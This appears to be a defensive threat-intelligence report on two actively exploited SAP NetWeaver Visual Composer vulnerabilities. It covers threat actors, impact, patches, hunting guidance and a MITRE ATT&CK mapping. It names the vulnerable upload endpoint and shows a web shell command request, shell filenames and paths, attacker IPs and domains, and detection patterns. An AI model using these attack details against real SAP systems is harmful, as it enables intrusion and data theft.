SAP Under Siege: Twin Zero-Days Demand Immediate Action – An In-depth Analysis of CVE-2025-31324 & CVE-2025-42999

1. Executive Summary: SAP Under Siege – Twin Zero-Days Demand Immediate Action

SAP systems, the backbone of countless global enterprises, are currently facing an acute and escalating threat. Two critical zero-day vulnerabilities within the SAP NetWeaver Visual Composer component, CVE-2025-31324 and CVE-2025-42999, are being actively exploited in the wild.1 Threat actors, including sophisticated China-nexus Advanced Persistent Threat (APT) groups, have been observed chaining these flaws to achieve full system compromise, with critical industries squarely in their sights.3 The urgency of this situation cannot be overstated; immediate patching, proactive threat hunting, and comprehensive security hardening are non-negotiable for any organization leveraging these ubiquitous SAP platforms.

The successful exploitation of these vulnerabilities grants attackers profound capabilities, including unauthenticated remote code execution (RCE), unauthorized data exfiltration, the deployment of debilitating ransomware, and ultimately, the complete takeover of SAP environments.2 Given that SAP systems often house an organization’s most sensitive data and manage its core operational processes, the potential for catastrophic business impact is exceptionally high.

The period of active zero-day exploitation preceding public disclosure and patch availability means that many systems could already be compromised. Attackers are known to deploy web shells and other backdoors for persistent access.1 Consequently, patching alone is an insufficient response; it addresses the vulnerability but does not remove existing malicious footholds.8 Organizations applying patches now must recognize this “patch paradox”—the fix might prevent future exploitation but does not remediate past intrusions. This necessitates retrospective threat hunting as a critical, parallel activity.

Furthermore, the confirmed involvement of multiple, well-resourced APT groups, such as Chaya_004 and UNC5221, signifies that these SAP vulnerabilities are viewed as high-value access vectors, likely for strategic espionage or disruption, extending beyond mere opportunistic attacks.3 The emergence of a “second wave” of attacks, where subsequent threat actors leverage backdoors established by initial exploiters, underscores an escalating and evolving threat landscape.4 This indicates that the value of the compromised access is sufficiently high to attract a succession of adversaries, potentially with increasing sophistication or differing objectives.

In response to this critical threat, organizations must prioritize the urgent application of SAP Security Notes 3594142 (addressing CVE-2025-31324) and 3604119 (addressing CVE-2025-42999).12 Concurrently, intensive investigations for any signs of existing compromise are crucial, alongside the implementation of robust detection mechanisms and system hardening measures.

2. Vulnerability Deep Dive: Unpacking CVE-2025-31324 and CVE-2025-42999

SAP NetWeaver Visual Composer is a web-based software modeling tool that enables business process specialists and developers to create application components for use within the SAP NetWeaver Portal, often without extensive coding.8 It has been included by default with base SAP NetWeaver installations since version 2004s, significantly broadening the potential attack surface.8 While not always actively enabled or configured in every deployment, its widespread presence, often as a dormant component, contributes to the risk.9 This “default but not always active” status can create a dangerous blind spot, as organizations might not realize a vulnerable component is present within their environment, particularly since Visual Composer has been deprecated since 2015.18 Asset inventory and specific checks for the VCFRAMEWORK component are therefore vital first steps.9

CVE-2025-31324: The Open Door – Unauthenticated Arbitrary File Upload

This vulnerability, assigned CVE-2025-31324, carries a CVSS v3.1 score of 10.0 (Critical).6 It originates from a fundamental missing authorization check in the Metadata Uploader component of SAP NetWeaver Visual Composer.6 This flaw is accessible via the /developmentserver/metadatauploader HTTP endpoint.6

The technical mechanics are alarmingly straightforward: any unauthenticated user, from anywhere on the network (including the internet, if the SAP system is exposed), can send specially crafted HTTP POST requests to this endpoint.6 These requests can upload arbitrary files, most notably JSP (Java Server Pages) web shells, directly onto the server’s file system.6 Attackers frequently place these malicious files into web-accessible directories, such as /irj/servlet_jsp/irj/root/.8

The impact is immediate and severe: Remote Code Execution (RCE).2 Once the web shell is uploaded, the attacker can execute arbitrary operating system commands with the privileges of the SAP application server process, typically the <SID>ADM user.6 Gaining execution context as <SID>ADM is a critical blow, as this user is effectively the SAP system administrator at the OS level. It possesses extensive permissions over SAP application directories, database configurations, and can execute a wide range of OS commands, leading to full system compromise.2 This is not merely application-level access; it is system-level control within the context of a business-critical application, essentially “game over” for that SAP system.

All SAP NetWeaver 7.x versions incorporating the Visual Composer Framework (VCFRAMEWORK) component are affected if left unpatched.2 SAP Security Note 3594142 provides an automated correction specifically for version 7.50.6 Older, unmaintained versions (e.g., 7.0-7.40) require manual workarounds.16

CVE-2025-42999: The Insider Threat Vector – Privileged Insecure Deserialization

The second vulnerability, CVE-2025-42999, is rated CVSS v3.0 9.1 (Critical) (CVSS v2: 8.3 High).12 It affects the SAP NetWeaver Visual Composer Metadata Uploader and is classified as an Insecure Deserialization flaw (CWE-502: Deserialization of Untrusted Data).21 Unlike its counterpart, this vulnerability requires the attacker to be a privileged user to upload untrusted or malicious content.13 When the SAP system subsequently deserializes this specially crafted content, it can lead to RCE, thereby compromising the confidentiality, integrity, and availability of the host system.1

While requiring initial privileged access might seem to make it less immediately dangerous than CVE-2025-31324, its critical CVSS score reflects the potential for severe damage if exploited. This could occur if an attacker has already gained privileged access through other means (including CVE-2025-31324) or through social engineering of an authorized user. The affected component is EP-VC-INF, with VCFRAMEWORK 7.50 specifically mentioned.12

A crucial operational detail is that SAP Security Note 3604119, which addresses CVE-2025-42999, must be applied even if Security Note 3594142 (for CVE-2025-31324) has already been implemented.12 This is because CVE-2025-31324 provides the unauthenticated entry, but CVE-2025-42999 can be exploited independently if privileged access is achieved via other vectors.

Table: Vulnerability Overview

To provide a clear, at-a-glance comparison of these two critical vulnerabilities, the following table summarizes their key characteristics:

CVE ID	CVSS v3.x Score	Severity	Vulnerability Type	Key Affected Component	Primary Impact(s)	Initial Privilege Req.	SAP Security Note
CVE-2025-31324	10.0	Critical	Unauthenticated Arbitrary File Upload	SAP NetWeaver Visual Composer	RCE, Full System Compromise	None	3594142
CVE-2025-42999	9.1	Critical	Insecure Deserialization	SAP NetWeaver Visual Composer	RCE, C/I/A Compromise	Privileged User	3604119

3. Anatomy of an Attack: From Initial Breach to Full Compromise

Understanding the typical attack lifecycle involving these vulnerabilities is crucial for effective defense. Threat actors have demonstrated a clear and repeatable pattern, often culminating in complete system control and the deployment of sophisticated post-exploitation tools.

Initial Access: Exploitation of CVE-2025-31324

The attack typically commences with the exploitation of CVE-2025-31324 due to its unauthenticated nature.

1. Targeting the Vulnerable Endpoint: Attackers send a specially crafted HTTP POST request to the /developmentserver/metadatauploader endpoint of an exposed SAP NetWeaver system.6
2. Bypassing Authentication & Uploading Web Shells: This request, requiring no prior authentication, successfully uploads a malicious file. The most common payload for this stage is a JSP web shell.6 Common filenames observed include helper.jsp and cache.jsp 6, but to evade signature-based detection, attackers also use randomly generated 8-character names (e.g., cglswdjp.jsp, ssonkfrd.jsp) or other less common names like coreasp.js.9
3. Placement in Web-Accessible Directories: These web shells are typically placed in directories that are accessible via a web browser, such as j2ee/cluster/apps/sap.com/irj/servlet_jsp/irj/root/.8
4. Executing Commands: Once the web shell is in place, the attacker can interact with it by sending simple HTTP GET requests (e.g., /irj/helper.jsp?cmd=id) to execute arbitrary operating system commands on the compromised server.7

The Deadly Combination: Chaining CVE-2025-31324 with CVE-2025-42999

Security researchers, notably from Onapsis, have confirmed that attackers are not always using these vulnerabilities in isolation. Since at least March 2025 (with initial probes dating back to January 2025), threat actors have been observed abusing both the lack of authentication provided by CVE-2025-31324 and the insecure deserialization mechanism of CVE-2025-42999.1

This chained exploitation is particularly dangerous because it allows attackers to execute arbitrary commands remotely without requiring any initial privileges on the system.1 The unauthenticated file upload (CVE-2025-31324) provides the initial RCE capability. The execution context of this initial web shell (often as <SID>ADM or another privileged SAP user) then fulfills the “privileged user” prerequisite for CVE-2025-42999. Attackers can then leverage this privileged context to upload further malicious content specifically designed to trigger the deserialization vulnerability. This secondary exploit might be used for more stealthy or powerful code execution, to achieve deeper persistence, or to exploit different facets of the SAP system.

It is important to recognize that applying the patch for CVE-2025-31324 (SAP Security Note 3594142) significantly mitigates the risk of this chained attack by closing off the initial unauthenticated entry point.5 However, for comprehensive protection, especially against scenarios where an attacker might gain initial privileged access through alternative means, patching CVE-2025-42999 (SAP Security Note 3604119) is also essential.

Post-Exploitation Playbook: Attacker TTPs After Initial Access

Once initial access is gained, attackers deploy a range of tactics, techniques, and procedures (TTPs) to solidify their control, conduct reconnaissance, and achieve their ultimate objectives. The observed TTPs indicate a degree of sophistication and familiarity with enterprise environments, including SAP-specific nuances. Attackers are not merely dropping generic malware; they are leveraging techniques and targeting information pertinent to SAP systems, such as aiming for <SID>ADM privileges and mapping SAP-specific application landscapes.4 This suggests an understanding of the target environment that goes beyond superficial exploitation.

The attack is rarely a single event but rather a campaign, often involving multiple stages and tools. This multi-stage lifecycle underscores the need for defense-in-depth, as detection opportunities may arise at various points beyond the initial breach.

• Persistence: The primary method for maintaining long-term access is the deployment of various web shells, as detailed earlier.1
• Command and Control (C2) & Payload Delivery:

• Brute Ratel C4: This commercial post-exploitation framework has been frequently observed. Attackers use it to load and decrypt malicious payloads, facilitate privilege escalation, steal credentials, and maintain C2 communication.3
• Custom/Go-based Shells: The Chaya_004 group is known to deploy “SuperShell,” a Go-based reverse shell, often hosted on attacker-controlled infrastructure like IP address 47.97.42[.]177.2
• Other Frameworks/Loaders: UNC5221 has deployed KrustyLoader (Rust-based) to deliver second-stage payloads like Sliver. UNC5174 has used the SNOWLIGHT loader to fetch a Go-based Remote Access Trojan (RAT) named “VShell” and the GOREVERSE backdoor.5
• Tool Transfer: Attackers use curl or the initial web shell to download further tools and payloads onto the compromised system.2
• Proxies: Reverse SSH SOCKS proxies are used for C2.6 Chaya_004 also utilizes NPS (an intranet penetration proxy) and GO Simple Tunnel.2

• Defense Evasion:

• Heaven’s Gate: This technique has been used to bypass endpoint security solutions.7
• Obfuscation: ELF binaries have been observed obfuscated with tools like Garble.6
• Fileless Execution: The coreasp.js web shell dynamically defines and loads Java classes in memory, avoiding disk writes and thus file-based detection.26

• Reconnaissance:

• Extensive use of standard operating system commands to gather information about the compromised system and its network environment: whoami, ipconfig/ifconfig, netstat, ps, ls, pwd, uname, df, id, hostname, net user, nltest.6
• Specific efforts to map SAP applications and identify backup details, likely for lateral movement or deeper compromise.26

• Impact/Objectives: The end goals vary but include:

• Full system takeover and control.2
• Exfiltration of sensitive data from SAP systems.7
• Deployment of ransomware.7
• Cryptocurrency mining.10
• Service disruption, for example, by corrupting Universal Description Discovery and Integration (UDDI) entries, which can affect communication between SAP modules like CRM, SCM, or SRM.2

The unauthenticated RCE capability of CVE-2025-31324 makes it a highly effective “gateway vulnerability.” Its ease of exploitation attracts a diverse range of threat actors, from sophisticated APTs focused on espionage or sabotage to financially motivated criminals deploying ransomware or cryptojackers. This means organizations face a multifaceted threat landscape stemming from this single initial point of weakness.

4. Global Impact Assessment: Scope, Prevalence, and Targeted Industries

The exploitation of CVE-2025-31324 and CVE-2025-42999 has had a tangible global impact, affecting a significant number of organizations across various critical sectors. The widespread deployment of SAP systems means that these vulnerabilities present a substantial systemic risk.

The Numbers Game: Vulnerable Instances Worldwide

Multiple security organizations have provided estimates of internet-facing SAP NetWeaver instances vulnerable to these flaws, painting a concerning picture of exposure:

• Onyphe: As of late April 2025, reported approximately 1,284 vulnerable NetWeaver instances accessible online, with a startling 474 of those already compromised with web shells. Their findings indicated that around 20 companies from the Fortune 500 or Global 500 lists were among the vulnerable, many already breached.1
• The Shadowserver Foundation: In late April 2025, was tracking over 2,040 SAP NetWeaver servers accessible via the internet and deemed vulnerable.1 Initial scans identified between 427 and over 450 exposed vulnerable instances globally.14
• Onapsis: Also in late April 2025, identified more than 10,000 internet-facing SAP applications that could potentially be at risk. They estimated that 50-70% of these applications have the vulnerable Visual Composer component enabled.16 Onapsis, in conjunction with Mandiant, has been tracking hundreds of confirmed compromises worldwide.4
• EclecticIQ: Uncovered attacker-controlled infrastructure containing a file that listed 581 SAP NetWeaver instances already compromised and backdoored with a web shell. Another file on the same infrastructure listed 800 domains running SAP NetWeaver, likely earmarked for future targeting.5

Geographically, data from The Shadowserver Foundation highlighted that the United States had the highest number of vulnerable servers (132-149), followed by India (45-50), Australia (37-38), Germany (29-30), and China (26-31).31

The sheer number of SAP installations globally, coupled with varying security maturity levels across organizations and the often-overlooked status of the Visual Composer component, suggests that vulnerable instances will likely persist for an extended period. This creates a “long tail” of potential compromise opportunities for attackers, well beyond the initial zero-day disclosure window. Patching complex enterprise systems like SAP can be a slow and resource-intensive process 12, and older, unsupported NetWeaver versions (7.0-7.40) will not receive automated patches, relying instead on manual workarounds.16

High-Value Targets: Industries in the Crosshairs

Given that SAP systems are integral to the operations of large enterprises and government agencies, they represent high-value targets for attackers.7 The observed exploitation patterns reveal a clear focus on several key industries:

• Manufacturing: Consistently highlighted as being heavily targeted and impacted.4
• Energy and Utilities / Critical Infrastructure: These sectors have been actively pursued by attackers leveraging these vulnerabilities.3
• Oil and Gas: Specifically named as a targeted vertical.4
• Government Organizations: A prime target due to the sensitive data and critical functions they manage.7
• Media and Entertainment:.3
• Pharmaceuticals:.3
• Retail:.3
• Organizations listed in the Fortune 500 / Global 500.1

The deliberate targeting of critical infrastructure sectors like manufacturing, energy, utilities, and oil & gas by sophisticated APTs is particularly alarming.3 SAP systems in these environments often manage or integrate with core industrial processes. A successful compromise could extend beyond data theft, potentially leading to operational shutdowns, manipulation of industrial controls, or even safety incidents, posing risks to national security and public safety.

Real-World Cases & Threat Actor Spotlight

The timeline of exploitation reveals that attackers had early knowledge of these vulnerabilities:

• Reconnaissance: Onapsis observed reconnaissance activity related to CVE-2025-31324 as early as January 2025.5 Palo Alto Networks also noted suspicious HTTP requests targeting the vulnerable endpoint in late January 2025.6
• Initial Exploitation: The first known instances of active exploitation occurred around March 12-14, 2025.5 Rapid7’s Managed Detection and Response (MDR) team observed exploitation from March 27, 2025, onwards.7
• Vendor Response: SAP released a workaround on April 8, 2025 29, followed by an emergency patch for CVE-2025-31324 (SAP Security Note 3594142) on April 24, 2025.6 The patch for CVE-2025-42999 (SAP Security Note 3604119) was released on May 12/13, 2025.1

Several distinct threat actor groups have been linked to these attacks:

• Chaya_004 (China-nexus): Identified by Forescout, this group has been exploiting CVE-2025-31324 since at least April 29, 2025 (post-patch release). They utilize the “SuperShell” (a Go-based reverse shell) and an extensive toolkit of Chinese-origin penetration testing tools. Their infrastructure is often hosted on Chinese cloud provider platforms (Alibaba, Tencent, Huawei), with associated IP addresses including 47.97.42[.]177 and 8.210.65[.]56.2
• Other China-Nexus APTs: Research from EclecticIQ, Mandiant, and Palo Alto Networks has attributed activity to additional China-nexus APTs, including UNC5221, UNC5174, and CL-STA-0048. These groups are reportedly linked to China’s Ministry of State Security (MSS) and deploy various loaders and backdoors such as KrustyLoader, Sliver, SNOWLIGHT, VShell, and GOREVERSE.3
• Opportunistic Attackers: Beyond state-sponsored groups, opportunistic attackers have also been observed exploiting publicly available information and leveraging web shells placed by the initial attackers.10 Their motivations can include cryptocurrency mining.10
• Initial Access Brokers (IABs): ReliaQuest researchers posited that some initial attackers might be IABs, based on observed delays between gaining initial access and subsequent follow-up actions.14

This progression from initial discovery and exploitation (potentially by vulnerability researchers or IABs) to targeted APT campaigns, and subsequently to broader opportunistic exploitation, illustrates an attacker ecosystem where different actors can build upon or benefit from each other’s activities. Public disclosure of vulnerability details and proof-of-concept exploits further fuels this cycle, meaning the threat landscape for a given vulnerability evolves rapidly, requiring defenders to anticipate this evolution.

5. Risk Profile & Business Implications: Understanding the True Cost

The confluence of high technical severity, active exploitation by sophisticated actors, and the critical role of SAP systems in business operations creates an exceptionally high-risk profile for organizations. Understanding these risks is paramount for prioritizing defensive actions and communicating the potential business impact to stakeholders.

Aggregated Risk Factors

Several factors contribute to the severe risk posed by CVE-2025-31324 and CVE-2025-42999:

• Extreme CVSS Scores: CVE-2025-31324 holds a CVSS score of 10.0 (Critical), the maximum possible, while CVE-2025-42999 is rated 9.1 (Critical). These scores reflect extreme technical severity and potential for damage.6
• Confirmed Active Exploitation: Both vulnerabilities are being actively exploited “in-the-wild” by a diverse range of threat actors, from highly sophisticated state-sponsored APTs to opportunistic cybercriminals. This transitions the threat from theoretical to immediate and tangible.1
• CISA Known Exploited Vulnerabilities (KEV) Catalog: The inclusion of CVE-2025-31324 in CISA’s KEV catalog mandates patching by U.S. federal agencies and strongly signals its widespread exploitation and critical nature to all organizations.1
• Ease of Exploitation (CVE-2025-31324): The lack of an authentication requirement for CVE-2025-31324, allowing direct RCE via a single HTTP request, makes it exceptionally easy for attackers to exploit.6
• Potent Chaining Capability: The ability for attackers to chain CVE-2025-31324 with CVE-2025-42999 to achieve unauthenticated remote code execution with high privileges significantly amplifies the overall threat.1

Potential Business Implications

A successful breach leveraging these vulnerabilities can have devastating consequences for an organization, striking at its operational core and financial stability. SAP systems are frequently the “crown jewels” of an enterprise, managing its most critical data and processes. A compromise here is not a peripheral IT issue but a fundamental threat to the business itself.

• Catastrophic Data Breach: Unauthorized access to, and exfiltration of, highly sensitive business data managed by SAP systems. This includes financial records, customer databases, intellectual property, strategic plans, and employee personally identifiable information (PII).7
• Severe Operational Disruption: Attackers can halt or cripple critical business processes that depend on SAP systems. This can lead to manufacturing shutdowns, supply chain interruptions, inability to process orders or deliver services, and prolonged downtime, resulting in significant loss of productivity.2
• Substantial Financial Losses: The direct and indirect costs can be enormous, encompassing incident response and forensic investigation fees, system recovery and restoration expenses, regulatory fines (e.g., under GDPR for data breaches), legal liabilities, and lost revenue due to operational disruptions and reputational harm.
• Irreparable Reputational Damage: Public disclosure of a major breach involving core SAP systems can lead to a severe loss of customer trust, damage to the brand’s image, negative investor sentiment, and sustained adverse media attention.
• Ransomware Deployment: The full system compromise achievable through these vulnerabilities makes SAP infrastructure a prime target for ransomware attacks. Attackers can encrypt essential data and critical system components, holding the organization’s operations hostage.7
• Espionage and Strategic Sabotage: In the context of state-sponsored attacks, the objectives may include long-term industrial or economic espionage, theft of national security information, or the strategic disruption of critical infrastructure and key industries.3
• Compliance and Regulatory Failures: A breach can result in non-compliance with numerous industry and governmental regulations related to data security, privacy, and system integrity, leading to further penalties and legal challenges.

The interconnected nature of modern business also means that the compromise of a major organization’s SAP systems can create a supply chain security risk. Many Fortune 500 companies, which are confirmed to be affected 1, act as central hubs in extensive supply chains. A breach at such a hub could expose partner data, disrupt shared processes, or even serve as a pivot point for attacks against connected entities.

Furthermore, as organizations increasingly rely on platforms like SAP for their digital transformation initiatives (e.g., migrations to S/4HANA 10), high-impact vulnerabilities of this nature can erode trust in these critical platforms. This can lead to increased scrutiny, demands for greater security investment, and potentially slow down strategic projects if the perceived risks are deemed too high, adding a strategic drag to the immediate costs of a breach.

6. Fortifying Your Defenses: Comprehensive Mitigation and Detection Strategies

Addressing the severe threats posed by CVE-2025-31324 and CVE-2025-42999 requires a multi-faceted approach encompassing immediate patching, system hardening, proactive threat hunting, and robust detection mechanisms. Given the active exploitation before patches were widely available, organizations must operate under the assumption of potential compromise and act decisively.

Priority One: Patch and Remediate – The SAP Security Notes

The most critical step is the immediate application of the relevant SAP Security Notes:

• SAP Security Note 3594142 (for CVE-2025-31324):

• Released on April 24, 2025, this “HotNews” note (CVSS 10.0) addresses the unauthenticated file upload vulnerability in SAP NetWeaver Visual Composer.11
• It provides an automated correction for version 7.50 of the Visual Composer Framework (VCFRAMEWORK).20
• The core fix involves implementing proper authentication and authorization checks to prevent unauthorized access and file uploads to the /developmentserver/metadatauploader endpoint.20
• This patch is the primary defense against the initial unauthenticated exploitation vector.

• SAP Security Note 3604119 (for CVE-2025-42999):

• Released on May 13, 2025, this “HotNews” note (CVSS 9.1) addresses the insecure deserialization vulnerability in the Visual Composer Metadata Uploader, which can be exploited by a privileged user.12
• Crucially, SAP and security researchers emphasize that this note MUST be implemented IN ADDITION to Note 3594142 to fully secure the Visual Composer component.12 While 3594142 blocks the unauthenticated entry, 3604119 is necessary to prevent exploitation if an attacker gains privileged access through other means or if malicious insider activity occurs.

• SAP KBA 3593336 (Workarounds for Older/Unsupported Versions):

• This Knowledge Base Article provides workaround guidance for SAP NetWeaver Java versions 7.0-7.40, which are no longer maintained by SAP and thus do not receive automated patches.16 These workarounds may also serve as temporary measures if patching of version 7.50 is unavoidably delayed.
• Workaround Options Include:

1. Disable Visual Composer (VCFRAMEWORK): If the Visual Composer component is not essential for business operations, it should be disabled entirely. SAP Note 2501341 provides directions for this.2 Visual Composer has been deprecated since 2015, making its removal a viable option for many.18
2. Disable the application alias for the Development Server: This restricts access to the specific vulnerable endpoint.18
3. Block access to the Development Server / Metadata Uploader endpoint: This can be achieved through:

• Access Control Lists (ACLs) defined within the Internet Communication Manager (ICM).20
• URL restrictions implemented via network firewall rules or the SAP Web Dispatcher to block access to /developmentserver/metadatauploader.2

Organizations should apply these patches on an emergency basis, without waiting for standard patch cycles.9 It is vital to understand that patching addresses the vulnerability going forward but does not remove any web shells, backdoors, or other malicious artifacts that may have been placed on the system prior to patching.8

Hardening Your SAP Landscape

Beyond patching, several hardening measures can reduce the attack surface and limit the impact of potential compromises:

• Restrict Network Access: As detailed in the workarounds, strictly limit network exposure of the /developmentserver/metadatauploader endpoint and other non-essential SAP services, especially from the internet.2
• Disable Unused Components: Regularly review and disable or uninstall SAP components that are not actively used, such as Visual Composer (VCFRAMEWORK.SCA if confirmed unnecessary via system info checks like http://host:port/nwa/sysinfo).2
• Network Segmentation: Implement robust network segmentation to isolate SAP systems, particularly internet-facing ones, from other parts of the corporate network. This can help contain breaches and limit lateral movement by attackers.8
• Principle of Least Privilege: Ensure that SAP user accounts, service accounts, and system processes operate with the minimum necessary permissions.
• Regular Security Assessments: Conduct frequent vulnerability scans and penetration tests that specifically include SAP NetWeaver endpoints and applications.2

Active Threat Hunting and Detection

Given the likelihood of pre-patch compromises, proactive threat hunting is essential.

• Log Analysis and SIEM Integration:

• Ensure comprehensive logging for SAP NetWeaver systems, including web server access logs, application server logs, and security audit logs. Forward these logs to a centralized Security Information and Event Management (SIEM) system for correlation and analysis.18
• Monitor for suspicious HTTP POST requests to /developmentserver/metadatauploader, especially those with unusual characteristics or originating from untrusted sources.6
• Hunt for HTTP GET requests to .jsp files (e.g., helper.jsp?cmd=…, cache.jsp?cmd=…, or randomly named .jsp files) in web server logs, particularly those containing command execution parameters or originating from unexpected IP addresses.8
• Look for abnormal access patterns or changes to service entries, especially those occurring outside of standard maintenance windows.2
• Investigate successful logins that occur immediately following suspected web shell activity or originate from atypical source IPs or geolocations.26

• Endpoint Detection and Response (EDR) and File System Monitoring:

• Actively scan SAP server file systems for known web shell filenames (e.g., helper.jsp, cache.jsp, usage.jsp, .webhelper.jsp, forwardsap.jsp, 404_error.jsp, .h.jsp, coreasp.js) and suspicious patterns (e.g., randomly named 8-character [a-z]{8}.jsp files, or variable-length alphanumeric names ≤ 10 characters ending in .jsp).6
• Common deployment paths to inspect include (and their Windows equivalents) 6:

• …/j2ee/cluster/apps/sap.com/irj/servlet_jsp/irj/root/
• …/j2ee/cluster/apps/sap.com/irj/servlet_jsp/irj/work/
• …/j2ee/cluster/apps/sap.com/irj/servlet_jsp/irj/work/sync/

• Utilities like find. -type f \( -name “*.jsp” -o -name “*.java” -o -name “*.class” \) -ls can help locate potentially malicious files in these directories.26
• Monitor for suspicious process execution chains, such as SAP server processes (e.g., java.exe) spawning command shells (cmd.exe, sh) or unexpected utilities like curl or wget downloading files from untrusted sources.
• Look for the execution of reconnaissance commands (e.g., whoami, net user, ipconfig, ps, ls, id) by SAP service accounts.6

• Network Intrusion Detection/Prevention Systems (NIDS/NIPS):

• Deploy and update NIDS/NIPS signatures specifically designed to detect exploitation attempts against CVE-2025-31324 (e.g., SonicWall IPS: 20946 8; Stormshield http:client.107 28).
• Monitor for network traffic patterns indicative of C2 communications associated with tools like Brute Ratel, SuperShell, Sliver, or Cobalt Strike.

• IOC Scanning Tools and Detection Rules:

• Leverage specialized tools like the open-source IOC scanner for CVE-2025-31324 released by Onapsis and Mandiant. This tool can help detect if a system is vulnerable, identify known IoCs, scan for unknown web-executable files in known exploit paths, and collect suspicious files for further analysis.11
• Utilize detection rules and content from security vendors:

• SOC Prime provides Sigma rules for detecting CVE-2025-31324 exploitation attempts.7
• Layer Seven Security’s Cybersecurity Extension for SAP includes capabilities to detect exploitation attempts and the presence of malicious files.20
• Rapid7 InsightIDR offers detection rules for related attacker techniques such as net command enumeration, nltest execution, and suspicious PowerShell downloads.9
• Palo Alto Networks Cortex Xpanse can identify internet-exposed SAP systems and includes an Attack Surface Test to confirm exploitability for this vulnerability.6

No single mitigation or detection technique is a silver bullet. The sophistication and multi-stage nature of these attacks necessitate a layered defense strategy. This includes not only preventative measures like patching and hardening but also robust detective capabilities across network, endpoint, and application layers, coupled with proactive threat hunting. The emphasis on applying both SAP Security Notes 3594142 and 3604119 underscores this principle: one note closes the unauthenticated external door, while the other addresses a vulnerability exploitable by an already privileged entity.

Furthermore, generic security tools may not always possess the nuanced understanding required to effectively monitor and protect complex SAP environments. Organizations with significant SAP deployments should consider augmenting their general security stack with SAP-specific security solutions and threat intelligence feeds from specialized vendors who focus on this ecosystem.12

Table: Key Indicators of Compromise (IoCs) for Detection

The following table consolidates key Indicators of Compromise (IoCs) derived from observed attacker TTPs. Security teams can use this information to inform their threat hunting activities and configure monitoring tools.

IoC Category	Examples / Description	Relevant Sources
Network Activity	Suspicious HTTP POST requests to /developmentserver/metadatauploader. HTTP GET requests to .jsp files (e.g., helper.jsp?cmd=id, cache.jsp, coreasp.js, randomly named .jsp files) often containing command parameters. C2 traffic to known malicious IP addresses such as 47.97.42[.]177, 8.210.65[.]56 (associated with Chaya_004), 15.204.56[.]106 (opendir with compromised list), 43.247.135[.]53 (CL-STA-0048 C2).	2
File System Artifacts	Web shells: helper.jsp, cache.jsp, ssonkfrd.jsp, cglswdjp.jsp, rrx.jsp, dyceorp.jsp, coreasp.js, ran.jsp, other randomly named 8-character [a-z]{8}.jsp files. Malicious ELF binary named “config”. Shell script config.sh.	2
	Common Paths: …/irj/servlet_jsp/irj/root/, …/irj/servlet_jsp/irj/work/, …/irj/servlet_jsp/irj/work/sync/ (and Windows equivalents: C:\usr\sap\<SID>\<InstanceID>\j2ee\cluster\apps\sap.com\irj\…)	6
Malicious IPs / Domains	47.97.42[.]177, 8.210.65[.]56, 49.232.93[.]226 (Chaya_004 infrastructure). 15.204.56[.]106 (attacker opendir). 43.247.135[.]53 (CL-STA-0048 C2). ocr-freespace[.]xyz (payload download). http://search-email[.]com:443/ServiceLogin/_/kids/signup/eligible (historic C2).	2
Suspicious Process Activity	SAP server processes (e.g., java.exe on Windows, corresponding Java processes on Linux) spawning child processes such as cmd.exe, sh, curl, wget. Execution of reconnaissance commands (whoami, net user, ipconfig/ifconfig, ps, ls, id, hostname, netstat, nltest) by the SAP system user account. Unexpected processes associated with known attacker tools like Brute Ratel, SuperShell, KrustyLoader, Sliver, Cobalt Strike.	5

7. Mapping the Threat: Alignment with MITRE ATT&CK®

The MITRE ATT&CK® framework provides a globally accessible knowledge base of adversary tactics and techniques based on real-world observations. Mapping the observed attacker behaviors associated with the exploitation of CVE-2025-31324 and CVE-2025-42999 to this framework helps in understanding the attack lifecycle in a standardized way and aids in prioritizing defensive measures.

The attackers leveraging these SAP vulnerabilities have demonstrated proficiency across a wide array of ATT&CK tactics, indicating a level of sophistication characteristic of mature and resourceful threat actors. This breadth of TTPs moves beyond simple opportunistic exploitation.

Observed Attacker Behaviors Mapped to ATT&CK Tactics & Techniques:

• Reconnaissance (TA0043):

• Activity includes scanning for vulnerable SAP instances using tools like Nuclei.5 Threat actor Chaya_004 utilizes asset reconnaissance modules such as Hunter, Fofa, and Quake.2

• Initial Access (TA0001):

• T1190 – Exploit Public-Facing Application: This is the primary initial access vector, involving the direct exploitation of CVE-2025-31324 on internet-facing SAP NetWeaver Visual Composer instances.15

• Execution (TA0002):

• T1059.007 – Command and Scripting Interpreter: Java: Central to the attack, as attackers execute JSP web shells on the SAP Java application server.6
• T1059.003 – Command and Scripting Interpreter: Windows Command Shell: Web shells are used to execute cmd.exe commands on Windows-based SAP servers.6
• T1059.004 – Command and Scripting Interpreter: Unix Shell: Similarly, sh or bash commands are executed via web shells on Linux-based SAP systems.26

• Persistence (TA0003):

• T1505.003 – Server Software Component: Web Shell: The deployment of various JSP web shells (e.g., helper.jsp, cache.jsp, randomly named files, coreasp.js) in SAP application directories provides attackers with sustained access to compromised systems.1
• KrustyLoader, deployed by UNC5221, is capable of setting up persistence, potentially via scheduled tasks or services.5

• Privilege Escalation (TA0004):

• T1068 – Exploitation for Privilege Escalation: The chaining of CVE-2025-31324 (gaining initial RCE as the SAP application user, e.g., <SID>ADM) with CVE-2025-42999 (requiring privileged access to trigger insecure deserialization) can be seen as a form of privilege escalation or consolidation of control.1 The Brute Ratel framework has also been used for privilege escalation.27

• Defense Evasion (TA0005):

• T1027 – Obfuscated Files or Information: The use of tools like Garble to obfuscate ELF binaries (e.g., the config binary used by Chaya_004) aims to hinder analysis.6
• T1027.009 – Embedded Payloads: The Brute Ratel framework is known to load and decrypt embedded malicious payloads.27
• T1622 – Debugger Evasion (Heaven’s Gate): The Heaven’s Gate technique was reportedly employed to bypass endpoint defenses.7
• T1218.007 – Signed Binary Proxy Execution: Msbuild: Reports indicate code injection into dllhost.exe using MSBuild for stealthy execution.30
• Fileless Execution: The coreasp.js web shell dynamically defines and loads Java classes in memory, avoiding disk writes to evade file-based detection.26

• Credential Access (TA0006):

• The Brute Ratel framework has capabilities for credential theft, which attackers may leverage post-compromise.27

• Discovery (TA0007):

• T1082 – System Information Discovery: Attackers execute commands like whoami, hostname, uname to gather basic system details.6
• T1057 – Process Discovery: Commands such as ps are used to list running processes.6
• T1049 – System Network Connections Discovery: netstat is used to identify active network connections.6
• T1033 – System Owner/User Discovery: id and whoami commands reveal user context.6
• T1482 – Domain Trust Discovery: nltest has been observed, often used to enumerate domain trust relationships.9
• T1087.001 – Account Discovery: Local Account: net user commands are used to list local user accounts.6
• Attackers also perform SAP-specific discovery, mapping applications and backup details.26

• Command and Control (TA0011):

• T1105 – Ingress Tool Transfer: Attackers download post-exploitation tools such as Brute Ratel C4, SuperShell, KrustyLoader, and various scripts onto compromised systems.2
